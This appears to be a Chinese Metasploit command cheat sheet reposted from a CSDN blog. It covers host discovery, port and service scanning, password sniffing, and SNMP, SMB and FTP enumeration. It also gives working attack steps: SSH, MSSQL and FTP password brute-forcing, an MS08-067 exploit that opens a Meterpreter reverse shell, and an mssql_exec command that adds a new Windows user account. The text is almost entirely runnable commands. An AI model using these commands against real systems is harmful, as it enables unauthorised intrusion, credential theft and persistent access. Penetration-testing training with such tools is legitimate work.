主机发现扫描
search arp
use auxiliary/scanner/discovery/arp_sweep
show options
set RHOSTS 192.168.1.0/24
set INTERFACE eth0
set THREADS 20 #线程数
run
端口扫描
search portscan
use auxiliary/scanner/portscan/syn #选择syn扫描
show options
set INTERFACE eth0
set PORTS 80
set RHOSTS 192.168.1.0/24
set THREADS 50
run
IPID Idle扫描(僵尸机扫描)
use auxiliary/scanner/ip/ipidseq
show options
set RHOSTS 192.168.1.1-150
set THREADS 20
run
也可以用nmap
msf > db_nmap -PN -sI 192.168.1.110
UDP扫描
use auxiliary/scanner/discovery/udp_sweep
show options
set RHOSTS 192.168.1.1-150
run
use auxiliary/scanner/discovery/udp_probe
show options
set RHOSTS 192.168.1.1-150
set CHOST 192.168.1.111
set THREADS 20
run
密码嗅探(被动信息扫描)
search sniffer
use auxiliary/sniffer/psnuffle
show options
set INTERFACE eth0
run
#也可以从pcap读取
set PCAPFILE /root/ftp.pcapng
jobs
kill 0 #把之前的kill
run
SNMP扫描
Linux
use auxiliary/scanner/snmp/snmp_login
show options
set RHOSTS 192.168.1.111
set THREADS 20
run
use auxiliary/scanner/snmp/snmp_enum
show options
set RHOSTS 192.168.1.111
run
windows
use auxiliary/scanner/snmp/snmp_enumusers
show options
set COMMUNITY jlcssadmin
set RHOSTS 192.168.1.112
run
use auxiliary/scanner/snmp/snmp_enumshares
show options
set COMMUNITY jlcssadmin
set RHOSTS 192.168.1.112
run
SMB扫描
#SMB版本扫描
use auxiliary/scanner/smb/smb_version
#扫描命令管道。判断 SMB 服务类型(账号、密码)
use auxiliary/scanner/smb/pipe_auditor
#扫描通过SMB管道可以访问的RCERPC服务
use auxiliary/scanner/smb/pipe_dcerpc_auditor
#SMB 共享账号(账号、密码)
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_enumusers
#SID 枚举(账号、密码)
use auxiliary/scanner/smb/smb_lookupsid
SSH扫描
#SSH 版本扫描
use auxiliary/scanner/ssh/ssh_version
set RHOSTS 192.168.1.126
run
#SSH 密码爆破
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 192.168.1.126
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
(现成的字典)
set VERBOSE false
run
#SSH 公钥登陆
use auxiliary/scanner/ssh/ssh_login_pubkey
set RHOSTS 192.168.1.126
set USERNAME root
set KEY_PATH id_rsa_test_file
获取 windows 缺少的补丁
基于已经取得的seesion进行检测
use post/windows/gather/enum_patches
set SESSION 4
show advanced
set VERBOSE yes
run
#ms08-067
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.1.126
set payload windows/meterpreter/reverse_tcp
run
mssql 扫描
#尝试ping,确定端口
use auxiliary/scanner/mssql/mssql_ping
mset RHOSTS 192.168.1.126
run
#爆破 mssql 密码
use auxiliary/scanner/mssql/mssql_login
set RHOSTS 192.168.1.126
set username Administrator
set password ... #选择一个密码字典
run
#远程执行代码(获取数据库权限之后)
use auxiliary/admin/mssql/mssql_exec
set RHOSTS 192.168.1.114 #自己的kali
set username Administrator
set password ... #这里是破解出来的密码
set CMD net user user1 pass123 /ADD #执行代码,在数据库里面加一个账号
FTP 扫描
#查询版本信息
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.126
run
#是否允许匿名登录
use auxiliary/scanner/ftp/anonymous
set RHOSTS 192.168.1.126
run
#暴力破解
use auxiliary/scanner/ftp/ftp_login
原文地址:https://fishpond.blog.csdn.net/article/details/105788422